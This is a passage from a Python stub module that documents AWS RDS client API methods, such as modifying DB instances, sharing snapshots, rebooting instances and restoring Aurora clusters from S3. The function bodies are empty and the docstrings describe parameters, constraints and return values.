        IOPS can take from under 24 hours up to several days, during which
        the instance stays available but may see degraded performance and
        suspended nightly backups.
    :type DBInstanceClass: string
    :param DBInstanceClass: New compute/memory capacity (e.g.
        ``db.m4.large``). Use ``DescribeOrderableDBInstanceOptions`` to
        list available classes; not all classes exist in all regions for
        all engines. Changing this causes an outage when applied.
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: New DB subnet group, used to move the
        instance to (or into) a different VPC. Causes an outage when the
        change is applied. Example: ``mySubnetGroup``.
    :type DBSecurityGroups: list
    :param DBSecurityGroups: DB security groups to authorize on this
        instance; applied asynchronously with no outage. (string) --
    :type VpcSecurityGroupIds: list
    :param VpcSecurityGroupIds: EC2 VPC security groups to authorize on
        this instance; applied asynchronously. (string) --
    :type ApplyImmediately: boolean
    :param ApplyImmediately: Apply this request's (and any pending)
        modifications as soon as possible instead of waiting for the
        preferred maintenance window. Default: ``False``.
    :type MasterUserPassword: string
    :param MasterUserPassword: New master user password; any printable
        ASCII character except '/', ''', or '@'. 8-41 characters (MySQL,
        MariaDB, Aurora), 8-30 (Oracle), or 8-128 (SQL Server). Applied
        asynchronously; visible in ``PendingModifiedValues`` meanwhile.
        The API never returns the password, so this is the way to regain
        access if it is lost.
    :type DBParameterGroupName: string
    :param DBParameterGroupName: DB parameter group to apply. The group
        name changes immediately, but parameter changes only take effect
        after a manual reboot without failover - the instance is NOT
        rebooted automatically. Must be in the same parameter group family
        as the instance.
    :type BackupRetentionPeriod: integer
    :param BackupRetentionPeriod: Days to retain automated backups (0-35;
        0 disables them). Changing between 0 and a non-zero value can
        cause an outage; non-zero to non-zero is applied asynchronously.
        Cannot be 0 if the instance sources Read Replicas; replica
        restrictions apply (MySQL 5.6 / PostgreSQL 9.3.5 sources).
    :type PreferredBackupWindow: string
    :param PreferredBackupWindow: Daily backup window in the format
        ``hh24:mi-hh24:mi`` (UTC), at least 30 minutes, and not
        conflicting with the maintenance window.
    :type PreferredMaintenanceWindow: string
    :param PreferredMaintenanceWindow: Weekly maintenance window, format
        ``ddd:hh24:mi-ddd:hh24:mi`` (UTC), days Mon-Sun, minimum 30
        minutes. Moving the window onto the current time with pending
        reboot actions causes an immediate reboot.
    :type MultiAZ: boolean
    :param MultiAZ: Whether the instance is a Multi-AZ deployment. Cannot
        be specified for a Read Replica.
    :type EngineVersion: string
    :param EngineVersion: Engine version to upgrade to; causes an outage
        when applied. Major version upgrades with a non-default parameter
        group require a parameter group from the new version's family.
        See ``CreateDBInstance`` for valid versions.
    :type AllowMajorVersionUpgrade: boolean
    :param AllowMajorVersionUpgrade: Must be ``True`` when
        ``EngineVersion`` specifies a different major version than the
        instance currently runs.
    :type AutoMinorVersionUpgrade: boolean
    :param AutoMinorVersionUpgrade: Apply minor version upgrades
        automatically during the maintenance window. Setting this to
        ``True`` can cause an outage if a newer auto-patched minor version
        is available during the window.
    :type LicenseModel: string
    :param LicenseModel: License model: ``license-included`` |
        ``bring-your-own-license`` | ``general-public-license``.
    :type Iops: integer
    :param Iops: New Provisioned IOPS value. Must be at least 10% greater
        than the current value; set to 0 when migrating back to standard
        storage (requires a reboot). Not supported for SQL Server. The
        standard/Provisioned-IOPS migration caveats described under
        ``AllocatedStorage`` apply here as well.
    :type OptionGroupName: string
    :param OptionGroupName: Option group to associate with the instance.
        Enabling OEM via the option group can cause a brief (sub-second)
        window of rejected new connections. Permanent options such as
        Oracle TDE cannot be removed once associated.
    :type NewDBInstanceIdentifier: string
    :param NewDBInstanceIdentifier: New identifier when renaming the
        instance; triggers a reboot (immediately, or at the next
        maintenance window, depending on ``ApplyImmediately``). Same
        naming constraints as ``DBInstanceIdentifier``.
    :type StorageType: string
    :param StorageType: Storage type: ``standard`` | ``gp2`` | ``io1``.
        ``io1`` requires ``Iops``. Default: ``io1`` if ``Iops`` is given,
        otherwise ``standard``.
    :type TdeCredentialArn: string
    :param TdeCredentialArn: ARN from the Key Store to associate with the
        instance for TDE encryption.
    :type TdeCredentialPassword: string
    :param TdeCredentialPassword: Password for the given Key Store ARN.
    :type CACertificateIdentifier: string
    :param CACertificateIdentifier: CA certificate to associate with the
        instance.
    :type Domain: string
    :param Domain: Active Directory Domain to move the instance to (or
        ``none`` to leave the current domain). The domain must already
        exist; currently only Microsoft SQL Server instances are
        supported.
    :type CopyTagsToSnapshot: boolean
    :param CopyTagsToSnapshot: Copy instance tags to snapshots.
        Default: ``False``.
    :type MonitoringInterval: integer
    :param MonitoringInterval: Seconds between Enhanced Monitoring metric
        collections; 0 (the default) disables collection. Valid values:
        0, 1, 5, 10, 15, 30, 60. Must be non-zero when
        ``MonitoringRoleArn`` is supplied.
    :type DBPortNumber: integer
    :param DBPortNumber: Port on which the database accepts connections;
        must not collide with any option-group port. Changing it restarts
        the database regardless of ``ApplyImmediately``. Defaults/ranges:
        MySQL/MariaDB/Aurora 3306, PostgreSQL 5432, Oracle 1521, SQL
        Server 1433; valid range 1150-65535 (SQL Server excludes 1434,
        3389, 47001, and 49152-49156).
    :type PubliclyAccessible: boolean
    :param PubliclyAccessible: Whether the instance gets a publicly
        resolvable DNS name. Applies only to instances in a VPC with a
        public subnet, and takes effect immediately regardless of
        ``ApplyImmediately``. Default: ``False``.
    :type MonitoringRoleArn: string
    :param MonitoringRoleArn: IAM role ARN permitting RDS to send
        enhanced monitoring metrics to CloudWatch Logs (e.g.
        ``arn:aws:iam:123456789012:role/emaccess``). Required when
        ``MonitoringInterval`` is non-zero.
    :type DomainIAMRoleName: string
    :param DomainIAMRoleName: IAM role used for Directory Service API
        calls.
    :type PromotionTier: integer
    :param PromotionTier: Order (0-15, default 1) in which an Aurora
        Replica is promoted after a primary failure.
    :type EnableIAMDatabaseAuthentication: boolean
    :param EnableIAMDatabaseAuthentication: Enable IAM-to-database account
        mapping (MySQL 5.6 >= 5.6.34, MySQL 5.7 >= 5.7.16).
        Default: ``False``.
    :rtype: dict
    :return: {'DBInstance': {...}} -- the full DB instance description,
        including identifiers, endpoint, security/parameter/subnet
        groups, ``PendingModifiedValues``, replica relationships,
        storage, monitoring, and domain membership details.
    :returns:
        CreateDBInstance
        DeleteDBInstance
        ModifyDBInstance
    """
    pass
def modify_db_parameter_group(DBParameterGroupName=None, Parameters=None):
    """Modify the parameters of a DB parameter group.

    To change more than one parameter, submit a list of dicts each
    carrying ``ParameterName``, ``ParameterValue``, and ``ApplyMethod``.
    At most 20 parameters can be modified in a single request.

    See also: AWS API Documentation (RDS ``ModifyDBParameterGroup``).

    :type DBParameterGroupName: string
    :param DBParameterGroupName: [REQUIRED] Name of an existing DB
        parameter group. 1-255 alphanumeric characters; first character
        must be a letter; cannot end with a hyphen or contain two
        consecutive hyphens.
    :type Parameters: list
    :param Parameters: [REQUIRED] Parameter names, values, and apply
        methods for the update; at least one triple must be supplied.
        Valid apply methods: ``immediate`` | ``pending-reboot``. The
        ``immediate`` method works with dynamic parameters only;
        ``pending-reboot`` works for both dynamic and static parameters,
        with changes applied on a reboot without failover.
        Each (dict) element may carry: ``ParameterName``,
        ``ParameterValue``, ``Description``, ``Source``, ``ApplyType``,
        ``DataType``, ``AllowedValues``, ``IsModifiable`` (some
        parameters cannot be changed for security or operational
        reasons), ``MinimumEngineVersion``, and ``ApplyMethod``.
    :rtype: dict
    :return: {
        'DBParameterGroupName': 'string'
        }
    """
    pass
def modify_db_snapshot(DBSnapshotIdentifier=None, EngineVersion=None):
    """Update a manual DB snapshot with a new engine version.

    The snapshot may be encrypted or not encrypted, and the target may be
    a new major or minor engine version. Amazon RDS supports upgrading a
    MySQL DB snapshot from MySQL 5.1 to MySQL 5.5.

    See also: AWS API Documentation (RDS ``ModifyDBSnapshot``).

    :type DBSnapshotIdentifier: string
    :param DBSnapshotIdentifier: [REQUIRED] Identifier of the DB snapshot
        to modify.
    :type EngineVersion: string
    :param EngineVersion: Engine version to update the DB snapshot to.
    :rtype: dict
    :return: {'DBSnapshot': {...}} -- the modified snapshot description,
        including identifiers, creation times, engine/version, storage,
        encryption, and source-region details.
    :returns:
        CreateDBSnapshot
        DeleteDBSnapshot
    """
    pass
def modify_db_snapshot_attribute(DBSnapshotIdentifier=None, AttributeName=None, ValuesToAdd=None, ValuesToRemove=None):
    """Add or remove an attribute and its values on a manual DB snapshot.

    To share a manual DB snapshot with other AWS accounts, pass
    ``restore`` as ``AttributeName`` and list the authorized AWS account
    IDs in ``ValuesToAdd``. The special value ``all`` makes the snapshot
    public (copyable/restorable by every AWS account) - do not use it for
    snapshots holding private information. Encrypted snapshots can only
    be shared with an explicit list of account IDs, never with ``all``.
    Use the ``DescribeDBSnapshotAttributes`` API action to see which
    accounts have access, or whether the snapshot is public or private.

    See also: AWS API Documentation (RDS ``ModifyDBSnapshotAttribute``).

    :type DBSnapshotIdentifier: string
    :param DBSnapshotIdentifier: [REQUIRED] Identifier of the DB snapshot
        whose attributes are modified.
    :type AttributeName: string
    :param AttributeName: [REQUIRED] Name of the attribute to modify; use
        ``restore`` to manage copy/restore authorization for other AWS
        accounts.
    :type ValuesToAdd: list
    :param ValuesToAdd: Values to add to the attribute named by
        ``AttributeName``: one or more AWS account IDs, or ``all`` to make
        the snapshot restorable by any account. (string) --
    :type ValuesToRemove: list
    :param ValuesToRemove: Values to remove from the attribute: one or
        more AWS account IDs, or ``all`` to revoke public access. When
        ``all`` is removed, accounts whose IDs are explicitly listed in
        the ``restore`` attribute can still copy or restore the snapshot.
        (string) --
    :rtype: dict
    :return: {
        'DBSnapshotAttributesResult': {
            'DBSnapshotIdentifier': 'string',
            'DBSnapshotAttributes': [
                {
                    'AttributeName': 'string',
                    'AttributeValues': [
                        'string',
                    ]
                },
            ]
        }
        }
    :returns:
        (string) --
    """
    pass
def modify_db_subnet_group(DBSubnetGroupName=None, DBSubnetGroupDescription=None, SubnetIds=None):
    """Modify an existing DB subnet group.

    DB subnet groups must contain at least one subnet in at least two AZs
    in the region.

    See also: AWS API Documentation

    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: [REQUIRED] The name for the DB subnet group,
        stored as a lowercase string. Constraints: no more than 255
        alphanumeric characters, periods, underscores, spaces, or hyphens;
        must not be 'default'. Example: mySubnetgroup
    :type DBSubnetGroupDescription: string
    :param DBSubnetGroupDescription: The description for the DB subnet group.
    :type SubnetIds: list
    :param SubnetIds: [REQUIRED] The EC2 subnet IDs (list of strings) for
        the DB subnet group.
    :rtype: dict
    :return: A dict with key 'DBSubnetGroup' describing the modified group:
        DBSubnetGroupName, DBSubnetGroupDescription, VpcId,
        SubnetGroupStatus, Subnets (each with SubnetIdentifier,
        SubnetAvailabilityZone.Name, SubnetStatus), and DBSubnetGroupArn.
    :returns: Related actions: CreateDBSubnetGroup, ModifyDBSubnetGroup,
        DescribeDBSubnetGroups, DeleteDBSubnetGroup.
    """
    pass
def modify_event_subscription(SubscriptionName=None, SnsTopicArn=None, SourceType=None, EventCategories=None, Enabled=None):
    """Modify an existing RDS event notification subscription.

    Source identifiers cannot be changed with this call; use
    AddSourceIdentifierToSubscription and
    RemoveSourceIdentifierFromSubscription for that. Event categories for a
    given SourceType are listed in the Events topic of the Amazon RDS User
    Guide or via the DescribeEventCategories action.

    See also: AWS API Documentation

    :type SubscriptionName: string
    :param SubscriptionName: [REQUIRED] The name of the RDS event
        notification subscription.
    :type SnsTopicArn: string
    :param SnsTopicArn: The ARN of the SNS topic created for event
        notification (created by Amazon SNS when you create a topic and
        subscribe to it).
    :type SourceType: string
    :param SourceType: The type of source generating the events, e.g.
        db-instance. If not specified, all events are returned.
        Valid values: db-instance | db-parameter-group | db-security-group
        | db-snapshot
    :type EventCategories: list
    :param EventCategories: Event categories (strings) for the SourceType
        to subscribe to.
    :type Enabled: boolean
    :param Enabled: Set to true to activate the subscription.
    :rtype: dict
    :return: A dict with key 'EventSubscription' describing the
        subscription: CustomerAwsId, CustSubscriptionId, SnsTopicArn,
        Status, SubscriptionCreationTime, SourceType, SourceIdsList,
        EventCategoriesList, Enabled, and EventSubscriptionArn.
    """
    pass
def modify_option_group(OptionGroupName=None, OptionsToInclude=None, OptionsToRemove=None, ApplyImmediately=None):
    """Modify an existing option group.

    See also: AWS API Documentation

    :type OptionGroupName: string
    :param OptionGroupName: [REQUIRED] The name of the option group to be
        modified. Permanent options, such as the TDE option for Oracle
        Advanced Security TDE, cannot be removed from an option group, and
        that option group cannot be removed from a DB instance once it is
        associated with a DB instance.
    :type OptionsToInclude: list
    :param OptionsToInclude: Options to add to the option group (or, if
        already present, whose configuration is updated). Each option is a
        dict with:
          - OptionName (string) [REQUIRED]
          - Port (integer): optional port for the option
          - OptionVersion (string): the version for the option
          - DBSecurityGroupMemberships (list of strings): DB security group
            membership names used for this option
          - VpcSecurityGroupMemberships (list of strings): VPC security
            group membership names used for this option
          - OptionSettings (list of dicts): the settings applied for the
            option; each has Name, Value, DefaultValue, Description,
            ApplyType, DataType, AllowedValues, IsModifiable (boolean),
            IsCollection (boolean)
    :type OptionsToRemove: list
    :param OptionsToRemove: Option names (strings) to remove from the
        option group.
    :type ApplyImmediately: boolean
    :param ApplyImmediately: Whether changes apply immediately, or during
        the next maintenance window for each instance associated with the
        option group.
    :rtype: dict
    :return: A dict with key 'OptionGroup' describing the modified group:
        OptionGroupName, OptionGroupDescription, EngineName,
        MajorEngineVersion, Options (each with OptionName,
        OptionDescription, Persistent, Permanent, Port, OptionVersion,
        OptionSettings, DBSecurityGroupMemberships,
        VpcSecurityGroupMemberships), AllowsVpcAndNonVpcInstanceMemberships,
        VpcId, and OptionGroupArn.
    :returns: Related actions: ModifyDBInstance, RebootDBInstance,
        RestoreDBInstanceFromDBSnapshot, RestoreDBInstanceToPointInTime.
    """
    pass
def promote_read_replica(DBInstanceIdentifier=None, BackupRetentionPeriod=None, PreferredBackupWindow=None):
    """Promote a Read Replica DB instance to a standalone DB instance.

    See also: AWS API Documentation

    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED] The DB instance identifier,
        stored as a lowercase string. Constraints:
          - Must be the identifier for an existing Read Replica DB instance
          - Must contain from 1 to 63 alphanumeric characters or hyphens
          - First character must be a letter
          - Cannot end with a hyphen or contain two consecutive hyphens
        Example: mydbinstance
    :type BackupRetentionPeriod: integer
    :param BackupRetentionPeriod: The number of days to retain automated
        backups. A positive number enables backups; 0 disables them.
        Default: 1. Constraints: must be a value from 0 to 8.
    :type PreferredBackupWindow: string
    :param PreferredBackupWindow: The daily time range during which
        automated backups are created if automated backups are enabled,
        using the BackupRetentionPeriod parameter. Default: a 30-minute
        window selected at random from an 8-hour block of time per region.
        Constraints:
          - Must be in the format hh24:mi-hh24:mi
          - Times should be in Universal Coordinated Time (UTC)
          - Must not conflict with the preferred maintenance window
          - Must be at least 30 minutes
    :rtype: dict
    :return: A dict with key 'DBInstance' describing the promoted instance:
        identifiers, class, engine, status, endpoint, storage, backup
        settings, security/parameter/subnet group memberships,
        PendingModifiedValues, replication identifiers, option group
        memberships, encryption settings (StorageEncrypted, KmsKeyId),
        monitoring settings, DBInstanceArn, Timezone, and
        IAMDatabaseAuthenticationEnabled.
    :returns: Related actions: CreateDBInstance, DeleteDBInstance,
        ModifyDBInstance.
    """
    pass
def promote_read_replica_db_cluster(DBClusterIdentifier=None):
    """Promote a Read Replica DB cluster to a standalone DB cluster.

    See also: AWS API Documentation

    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED] The identifier of the DB cluster
        Read Replica to promote. Not case-sensitive. Constraints:
          - Must contain from 1 to 63 alphanumeric characters or hyphens
          - First character must be a letter
          - Cannot end with a hyphen or contain two consecutive hyphens
        Example: my-cluster-replica1
    :rtype: dict
    :return: A dict with key 'DBCluster' describing the promoted cluster:
        AllocatedStorage, AvailabilityZones, BackupRetentionPeriod,
        CharacterSetName, DatabaseName, DBClusterIdentifier,
        DBClusterParameterGroup, DBSubnetGroup, Status, PercentProgress,
        restore times, Endpoint/ReaderEndpoint, MultiAZ, Engine,
        EngineVersion, Port, MasterUsername, option group and cluster
        memberships, maintenance/backup windows,
        ReplicationSourceIdentifier, ReadReplicaIdentifiers,
        VpcSecurityGroups, HostedZoneId, StorageEncrypted, KmsKeyId,
        DbClusterResourceId, DBClusterArn, AssociatedRoles,
        IAMDatabaseAuthenticationEnabled, and ClusterCreateTime.
    :returns: Related actions: CreateDBCluster, DeleteDBCluster,
        FailoverDBCluster, ModifyDBCluster, RestoreDBClusterFromSnapshot,
        RestoreDBClusterToPointInTime.
    """
    pass
def purchase_reserved_db_instances_offering(ReservedDBInstancesOfferingId=None, ReservedDBInstanceId=None, DBInstanceCount=None, Tags=None):
    """Purchase a reserved DB instance offering.

    See also: AWS API Documentation

    :type ReservedDBInstancesOfferingId: string
    :param ReservedDBInstancesOfferingId: [REQUIRED] The ID of the Reserved
        DB instance offering to purchase.
        Example: 438012d3-4052-4cc7-b2e3-8d3372e0e706
    :type ReservedDBInstanceId: string
    :param ReservedDBInstanceId: Customer-specified identifier to track
        this reservation. Example: myreservationID
    :type DBInstanceCount: integer
    :param DBInstanceCount: The number of instances to reserve. Default: 1
    :type Tags: list
    :param Tags: A list of tags. Each tag is a dict with:
          - Key (string): the required tag name; 1 to 128 Unicode
            characters, cannot be prefixed with 'aws:' or 'rds:', and may
            only contain Unicode letters, digits, white-space, '_', '.',
            '/', '=', '+', '-'
            (Java regex: '^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$')
          - Value (string): the optional tag value; 1 to 256 Unicode
            characters with the same prefix and character restrictions
    :rtype: dict
    :return: A dict with key 'ReservedDBInstance' describing the purchase:
        ReservedDBInstanceId, ReservedDBInstancesOfferingId,
        DBInstanceClass, StartTime, Duration, FixedPrice, UsagePrice,
        CurrencyCode, DBInstanceCount, ProductDescription, OfferingType,
        MultiAZ, State, RecurringCharges, and ReservedDBInstanceArn.
    """
    pass
def reboot_db_instance(DBInstanceIdentifier=None, ForceFailover=None):
    """Reboot a DB instance, restarting the database engine service.

    A reboot also applies any pending modifications to the associated DB
    parameter group and results in a momentary outage during which the DB
    instance status is set to rebooting. If the RDS instance is configured
    for MultiAZ, the reboot may be conducted through a failover; you can
    force one to test availability of your deployment or to restore
    operations to the original AZ after a failover occurs. An Amazon RDS
    event is created when the reboot is completed. Reboot time depends on
    the engine's crash recovery process; reducing database activity during
    the reboot reduces rollback activity for in-transit transactions.

    See also: AWS API Documentation

    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED] The DB instance identifier,
        stored as a lowercase string. Constraints:
          - Must contain from 1 to 63 alphanumeric characters or hyphens
          - First character must be a letter
          - Cannot end with a hyphen or contain two consecutive hyphens
    :type ForceFailover: boolean
    :param ForceFailover: When true, the reboot is conducted through a
        MultiAZ failover. Constraint: you cannot specify true if the
        instance is not configured for MultiAZ.
    :rtype: dict
    :return: A dict with key 'DBInstance' describing the rebooted instance:
        identifiers, class, engine, status, endpoint, storage, backup
        settings, security/parameter/subnet group memberships,
        PendingModifiedValues, replication identifiers, option group
        memberships, encryption settings (StorageEncrypted, KmsKeyId),
        monitoring settings, DBInstanceArn, Timezone, and
        IAMDatabaseAuthenticationEnabled.
    :returns: Related actions: CreateDBInstance, DeleteDBInstance,
        ModifyDBInstance.
    """
    pass
def remove_role_from_db_cluster(DBClusterIdentifier=None, RoleArn=None):
    """Disassociate an IAM role from an Aurora DB cluster.

    For more information, see Authorizing Amazon Aurora to Access Other AWS
    Services On Your Behalf.

    See also: AWS API Documentation

    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED] The name of the DB cluster to
        disassociate the IAM role from.
    :type RoleArn: string
    :param RoleArn: [REQUIRED] The Amazon Resource Name (ARN) of the IAM
        role to disassociate from the Aurora DB cluster, for example
        arn:aws:iam::123456789012:role/AuroraAccessRole.
    """
    pass
def remove_source_identifier_from_subscription(SubscriptionName=None, SourceIdentifier=None):
    """Remove a source identifier from an existing RDS event notification
    subscription.

    See also: AWS API Documentation

    :type SubscriptionName: string
    :param SubscriptionName: [REQUIRED] The name of the RDS event
        notification subscription you want to remove a source identifier
        from.
    :type SourceIdentifier: string
    :param SourceIdentifier: [REQUIRED] The source identifier to be removed
        from the subscription, such as the DB instance identifier for a DB
        instance or the name of a security group.
    :rtype: dict
    :return: A dict with key 'EventSubscription' describing the updated
        subscription: CustomerAwsId, CustSubscriptionId, SnsTopicArn,
        Status, SubscriptionCreationTime, SourceType, SourceIdsList,
        EventCategoriesList, Enabled, and EventSubscriptionArn.
    """
    pass
def remove_tags_from_resource(ResourceName=None, TagKeys=None):
    """Remove metadata tags from an Amazon RDS resource.

    For an overview on tagging an Amazon RDS resource, see Tagging Amazon
    RDS Resources.

    See also: AWS API Documentation

    Example::

        response = client.remove_tags_from_resource(
            ResourceName='arn:aws:rds:us-east-1:992648334831:og:mydboptiongroup',
            TagKeys=[
                'MyKey',
            ],
        )

    :type ResourceName: string
    :param ResourceName: [REQUIRED] The Amazon RDS resource the tags will
        be removed from, given as an Amazon Resource Name (ARN). For
        information about creating an ARN, see Constructing an RDS Amazon
        Resource Name (ARN).
    :type TagKeys: list
    :param TagKeys: [REQUIRED] The tag key (name) of each tag to be
        removed, as a list of strings.
    """
    pass
def reset_db_cluster_parameter_group(DBClusterParameterGroupName=None, ResetAllParameters=None, Parameters=None):
    """Reset parameters of a DB cluster parameter group to default values.

    To reset specific parameters, submit a list of ParameterName and
    ApplyMethod entries. To reset the entire DB cluster parameter group,
    specify DBClusterParameterGroupName and ResetAllParameters. When
    resetting the entire group, dynamic parameters are updated immediately
    and static parameters are set to pending-reboot, taking effect on the
    next DB instance restart or RebootDBInstance request; you must call
    RebootDBInstance for every DB instance in your DB cluster that you want
    the updated static parameter to apply to. For more information on
    Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.

    See also: AWS API Documentation

    :type DBClusterParameterGroupName: string
    :param DBClusterParameterGroupName: [REQUIRED] The name of the DB
        cluster parameter group to reset.
    :type ResetAllParameters: boolean
    :param ResetAllParameters: Set to true to reset all parameters in the
        group to their default values, false otherwise. Cannot be used
        together with a list of names in the Parameters parameter.
    :type Parameters: list
    :param Parameters: Parameters to reset to default values; cannot be
        used if ResetAllParameters is true. Each entry is a dict (the same
        data type used by ModifyDBParameterGroup/ResetDBParameterGroup and
        returned by DescribeEngineDefaultParameters/DescribeDBParameters)
        with: ParameterName, ParameterValue, Description, Source,
        ApplyType, DataType, AllowedValues, IsModifiable (boolean),
        MinimumEngineVersion, and ApplyMethod
        ('immediate' | 'pending-reboot').
    :rtype: dict
    :return: {'DBClusterParameterGroupName': 'string'}
    :returns: Name constraints: must be 1 to 255 alphanumeric characters;
        first character must be a letter; cannot end with a hyphen or
        contain two consecutive hyphens.
    """
    pass
def reset_db_parameter_group(DBParameterGroupName=None, ResetAllParameters=None, Parameters=None):
    """Reset parameters of a DB parameter group to engine/system defaults.

    To reset specific parameters, provide a list of ParameterName and
    ApplyMethod entries. To reset the entire DB parameter group, specify
    the DBParameterGroup name and ResetAllParameters. When resetting the
    entire group, dynamic parameters are updated immediately and static
    parameters are set to pending-reboot, taking effect on the next DB
    instance restart or RebootDBInstance request.

    See also: AWS API Documentation

    :type DBParameterGroupName: string
    :param DBParameterGroupName: [REQUIRED] The name of the DB parameter
        group. Constraints: must be 1 to 255 alphanumeric characters;
        first character must be a letter; cannot end with a hyphen or
        contain two consecutive hyphens.
    :type ResetAllParameters: boolean
    :param ResetAllParameters: Whether (true) or not (false) to reset all
        parameters in the DB parameter group to default values.
        Default: true
    :type Parameters: list
    :param Parameters: Parameters to reset; a maximum of 20 parameters can
        be modified in a single request. Valid ApplyMethod values by
        engine:
          - MySQL: immediate | pending-reboot (immediate for dynamic
            parameters only; pending-reboot for both dynamic and static,
            applied when the DB instance reboots)
          - MariaDB: immediate | pending-reboot (same rules as MySQL)
          - Oracle: pending-reboot
        Each entry is a dict (the same data type used by
        ModifyDBParameterGroup/ResetDBParameterGroup and returned by
        DescribeEngineDefaultParameters/DescribeDBParameters) with:
        ParameterName, ParameterValue, Description, Source, ApplyType,
        DataType, AllowedValues, IsModifiable (boolean),
        MinimumEngineVersion, and ApplyMethod
        ('immediate' | 'pending-reboot').
    :rtype: dict
    :return: {'DBParameterGroupName': 'string'}
    """
    pass
def restore_db_cluster_from_s3(AvailabilityZones=None, BackupRetentionPeriod=None, CharacterSetName=None, DatabaseName=None, DBClusterIdentifier=None, DBClusterParameterGroupName=None, VpcSecurityGroupIds=None, DBSubnetGroupName=None, Engine=None, EngineVersion=None, Port=None, MasterUsername=None, MasterUserPassword=None, OptionGroupName=None, PreferredBackupWindow=None, PreferredMaintenanceWindow=None, Tags=None, StorageEncrypted=None, KmsKeyId=None, EnableIAMDatabaseAuthentication=None, SourceEngine=None, SourceEngineVersion=None, S3BucketName=None, S3Prefix=None, S3IngestionRoleArn=None):
    """
    Creates an Amazon Aurora DB cluster from data stored in an Amazon S3 bucket. Amazon RDS must be authorized to access the Amazon S3 bucket and the data must be created using the Percona XtraBackup utility as described in Migrating Data from MySQL by Using an Amazon S3 Bucket .
    See also: AWS API Documentation
    :example: response = client.restore_db_cluster_from_s3(
    AvailabilityZones=[
    'string',
    ],
    BackupRetentionPeriod=123,
    CharacterSetName='string',
    DatabaseName='string',
    DBClusterIdentifier='string',
    DBClusterParameterGroupName='string',
    VpcSecurityGroupIds=[
    'string',
    ],
    DBSubnetGroupName='string',
    Engine='string',
    EngineVersion='string',
    Port=123,
    MasterUsername='string',
    MasterUserPassword='string',
    OptionGroupName='string',
    PreferredBackupWindow='string',
    PreferredMaintenanceWindow='string',
    Tags=[
    {
    'Key': 'string',
    'Value': 'string'
    },
    ],
    StorageEncrypted=True|False,
    KmsKeyId='string',
    EnableIAMDatabaseAuthentication=True|False,
    SourceEngine='string',
    SourceEngineVersion='string',
    S3BucketName='string',
    S3Prefix='string',
    S3IngestionRoleArn='string'
    )
    :type AvailabilityZones: list
    :param AvailabilityZones: A list of EC2 Availability Zones that instances in the restored DB cluster can be created in.
    (string) --
    :type BackupRetentionPeriod: integer
    :param BackupRetentionPeriod: The number of days for which automated backups of the restored DB cluster are retained. You must specify a minimum value of 1.
    Default: 1
    Constraints:
    Must be a value from 1 to 35
    :type CharacterSetName: string
    :param CharacterSetName: A value that indicates that the restored DB cluster should be associated with the specified CharacterSet.
    :type DatabaseName: string
    :param DatabaseName: The database name for the restored DB cluster.
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED]
    The name of the DB cluster to create from the source data in the S3 bucket. This parameter isn't case-sensitive.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens.
    First character must be a letter.
    Cannot end with a hyphen or contain two consecutive hyphens.
    Example: my-cluster1
    :type DBClusterParameterGroupName: string
    :param DBClusterParameterGroupName: The name of the DB cluster parameter group to associate with the restored DB cluster. If this argument is omitted, default.aurora5.6 will be used.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type VpcSecurityGroupIds: list
    :param VpcSecurityGroupIds: A list of EC2 VPC security groups to associate with the restored DB cluster.
    (string) --
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: A DB subnet group to associate with the restored DB cluster.
    Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
    Example: mySubnetgroup
    :type Engine: string
    :param Engine: [REQUIRED]
    The name of the database engine to be used for the restored DB cluster.
    Valid Values: aurora
    :type EngineVersion: string
    :param EngineVersion: The version number of the database engine to use.
    Aurora
    Example: 5.6.10a
    :type Port: integer
    :param Port: The port number on which the instances in the restored DB cluster accept connections.
    Default: 3306
    :type MasterUsername: string
    :param MasterUsername: [REQUIRED]
    The name of the master user for the restored DB cluster.
    Constraints:
    Must be 1 to 16 alphanumeric characters.
    First character must be a letter.
    Cannot be a reserved word for the chosen database engine.
    :type MasterUserPassword: string
    :param MasterUserPassword: [REQUIRED]
    The password for the master database user. This password can contain any printable ASCII character except '/', ''', or '@'.
    Constraints: Must contain from 8 to 41 characters.
    :type OptionGroupName: string
    :param OptionGroupName: A value that indicates that the restored DB cluster should be associated with the specified option group.
    Permanent options cannot be removed from an option group. An option group cannot be removed from a DB cluster once it is associated with a DB cluster.
    :type PreferredBackupWindow: string
    :param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled using the BackupRetentionPeriod parameter.
    Default: A 30-minute window selected at random from an 8-hour block of time per region. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
    Constraints:
    Must be in the format hh24:mi-hh24:mi .
    Times should be in Universal Coordinated Time (UTC).
    Must not conflict with the preferred maintenance window.
    Must be at least 30 minutes.
    :type PreferredMaintenanceWindow: string
    :param PreferredMaintenanceWindow: The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC).
    Format: ddd:hh24:mi-ddd:hh24:mi
    Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
    Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
    Constraints: Minimum 30-minute window.
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
